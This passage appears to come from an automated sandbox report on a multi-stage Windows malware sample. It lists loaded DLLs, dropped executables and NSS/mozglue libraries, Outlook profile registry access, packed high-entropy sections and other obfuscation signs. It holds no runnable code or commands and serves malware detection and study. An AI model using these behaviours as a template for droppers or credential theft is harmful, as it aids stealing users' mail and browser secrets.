Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: file.exe Static file information: File size 1945600 > 1048576
Source: file.exe Static PE information: Raw size of zenyeedi is bigger than: 0x100000 < 0x1a9600
Source: Binary string: mozglue.pdbP source: 4065fbc12b.exe, 00000008.00000002.3005510475.000000006C2FD000.00000002.00000001.01000000.0000000D.sdmp, mozglue.dll.8.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.8.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.8.dr
Source: Binary string: nss3.pdb@ source: 4065fbc12b.exe, 00000008.00000002.3005843048.000000006C4BF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.8.dr, nss3[1].dll.8.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.8.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.8.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.8.dr
Source: Binary string: nss3.pdb source: 4065fbc12b.exe, 00000008.00000002.3005843048.000000006C4BF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.8.dr, nss3[1].dll.8.dr
Source: Binary string: mozglue.pdb source: 4065fbc12b.exe, 00000008.00000002.3005510475.000000006C2FD000.00000002.00000001.01000000.0000000D.sdmp, mozglue.dll.8.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.8.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.c90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zenyeedi:EW;rzqusies:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zenyeedi:EW;rzqusies:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 2.2.axplong.exe.f40000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zenyeedi:EW;rzqusies:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zenyeedi:EW;rzqusies:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 3.2.axplong.exe.f40000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zenyeedi:EW;rzqusies:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zenyeedi:EW;rzqusies:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 7.2.axplong.exe.f40000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zenyeedi:EW;rzqusies:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zenyeedi:EW;rzqusies:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Unpacked PE file: 8.2.4065fbc12b.exe.8e0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;izqgivfx:EW;ypexyihr:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;izqgivfx:EW;ypexyihr:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Unpacked PE file: 9.2.4d1c7345ec.exe.de0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ncirbphu:EW;gfesspyr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ncirbphu:EW;gfesspyr:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 10.2.skotes.exe.e20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ncirbphu:EW;gfesspyr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ncirbphu:EW;gfesspyr:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 11.2.skotes.exe.e20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ncirbphu:EW;gfesspyr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ncirbphu:EW;gfesspyr:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Unpacked PE file: 12.2.4065fbc12b.exe.8e0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;izqgivfx:EW;ypexyihr:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;izqgivfx:EW;ypexyihr:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Unpacked PE file: 13.2.4d1c7345ec.exe.de0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ncirbphu:EW;gfesspyr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ncirbphu:EW;gfesspyr:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 14.2.skotes.exe.e20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ncirbphu:EW;gfesspyr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ncirbphu:EW;gfesspyr:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Unpacked PE file: 15.2.4065fbc12b.exe.8e0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;izqgivfx:EW;ypexyihr:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;izqgivfx:EW;ypexyihr:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Unpacked PE file: 16.2.4d1c7345ec.exe.de0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ncirbphu:EW;gfesspyr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ncirbphu:EW;gfesspyr:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 17.2.skotes.exe.e20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ncirbphu:EW;gfesspyr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ncirbphu:EW;gfesspyr:EW;.taggant:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C2EC410 LoadLibraryW,GetProcAddress,FreeLibrary, 8_2_6C2EC410
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: random[1].exe.7.dr Static PE information: real checksum: 0x1c4140 should be: 0x1c5401
Source: axplong.exe.0.dr Static PE information: real checksum: 0x1eaad7 should be: 0x1e73e7
Source: 951fa0b99a.exe.17.dr Static PE information: real checksum: 0x1c4140 should be: 0x1c5401
Source: random[1].exe0.7.dr Static PE information: real checksum: 0x1e0d39 should be: 0x1d6368
Source: 4065fbc12b.exe.7.dr Static PE information: real checksum: 0x1c4140 should be: 0x1c5401
Source: 4d1c7345ec.exe.7.dr Static PE information: real checksum: 0x1e0d39 should be: 0x1d6368
Source: file.exe Static PE information: real checksum: 0x1eaad7 should be: 0x1e73e7
Source: skotes.exe.9.dr Static PE information: real checksum: 0x1e0d39 should be: 0x1d6368
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: zenyeedi
Source: file.exe Static PE information: section name: rzqusies
Source: file.exe Static PE information: section name: .taggant
Source: axplong.exe.0.dr Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name: .idata
Source: axplong.exe.0.dr Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name: zenyeedi
Source: axplong.exe.0.dr Static PE information: section name: rzqusies
Source: axplong.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe.7.dr Static PE information: section name:
Source: random[1].exe.7.dr Static PE information: section name: .rsrc
Source: random[1].exe.7.dr Static PE information: section name: .idata
Source: random[1].exe.7.dr Static PE information: section name:
Source: random[1].exe.7.dr Static PE information: section name: izqgivfx
Source: random[1].exe.7.dr Static PE information: section name: ypexyihr
Source: random[1].exe.7.dr Static PE information: section name: .taggant
Source: 4065fbc12b.exe.7.dr Static PE information: section name:
Source: 4065fbc12b.exe.7.dr Static PE information: section name: .rsrc
Source: 4065fbc12b.exe.7.dr Static PE information: section name: .idata
Source: 4065fbc12b.exe.7.dr Static PE information: section name:
Source: 4065fbc12b.exe.7.dr Static PE information: section name: izqgivfx
Source: 4065fbc12b.exe.7.dr Static PE information: section name: ypexyihr
Source: 4065fbc12b.exe.7.dr Static PE information: section name: .taggant
Source: random[1].exe0.7.dr Static PE information: section name:
Source: random[1].exe0.7.dr Static PE information: section name: .idata
Source: random[1].exe0.7.dr Static PE information: section name:
Source: random[1].exe0.7.dr Static PE information: section name: ncirbphu
Source: random[1].exe0.7.dr Static PE information: section name: gfesspyr
Source: random[1].exe0.7.dr Static PE information: section name: .taggant
Source: 4d1c7345ec.exe.7.dr Static PE information: section name:
Source: 4d1c7345ec.exe.7.dr Static PE information: section name: .idata
Source: 4d1c7345ec.exe.7.dr Static PE information: section name:
Source: 4d1c7345ec.exe.7.dr Static PE information: section name: ncirbphu
Source: 4d1c7345ec.exe.7.dr Static PE information: section name: gfesspyr
Source: 4d1c7345ec.exe.7.dr Static PE information: section name: .taggant
Source: freebl3.dll.8.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.8.dr Static PE information: section name: .00cfg
Source: mozglue.dll.8.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.8.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.8.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.8.dr Static PE information: section name: .didat
Source: nss3.dll.8.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.8.dr Static PE information: section name: .00cfg
Source: softokn3.dll.8.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.8.dr Static PE information: section name: .00cfg
Source: skotes.exe.9.dr Static PE information: section name:
Source: skotes.exe.9.dr Static PE information: section name: .idata
Source: skotes.exe.9.dr Static PE information: section name:
Source: skotes.exe.9.dr Static PE information: section name: ncirbphu
Source: skotes.exe.9.dr Static PE information: section name: gfesspyr
Source: skotes.exe.9.dr Static PE information: section name: .taggant
Source: 951fa0b99a.exe.17.dr Static PE information: section name:
Source: 951fa0b99a.exe.17.dr Static PE information: section name: .rsrc
Source: 951fa0b99a.exe.17.dr Static PE information: section name: .idata
Source: 951fa0b99a.exe.17.dr Static PE information: section name:
Source: 951fa0b99a.exe.17.dr Static PE information: section name: izqgivfx
Source: 951fa0b99a.exe.17.dr Static PE information: section name: ypexyihr
Source: 951fa0b99a.exe.17.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_00F5D84C push ecx; ret 7_2_00F5D85F
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C2BB536 push ecx; ret 8_2_6C2BB549
Source: file.exe Static PE information: section name: entropy: 7.980813454908242
Source: file.exe Static PE information: section name: zenyeedi entropy: 7.952254784669665
Source: axplong.exe.0.dr Static PE information: section name: entropy: 7.980813454908242
Source: axplong.exe.0.dr Static PE information: section name: zenyeedi entropy: 7.952254784669665
Source: random[1].exe.7.dr Static PE information: section name: izqgivfx entropy: 7.953196989734309
Source: 4065fbc12b.exe.7.dr Static PE information: section name: izqgivfx entropy: 7.953196989734309
Source: random[1].exe0.7.dr Static PE information: section name: entropy: 7.983631674946491
Source: random[1].exe0.7.dr Static PE information: section name: ncirbphu entropy: 7.954879247954048
Source: 4d1c7345ec.exe.7.dr Static PE information: section name: entropy: 7.983631674946491
Source: 4d1c7345ec.exe.7.dr Static PE information: section name: ncirbphu entropy: 7.954879247954048
Source: skotes.exe.9.dr Static PE information: section name: entropy: 7.983631674946491
Source: skotes.exe.9.dr Static PE information: section name: ncirbphu entropy: 7.954879247954048
Source: 951fa0b99a.exe.17.dr Static PE information: section name: izqgivfx entropy: 7.953196989734309
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe Jump to dropped file
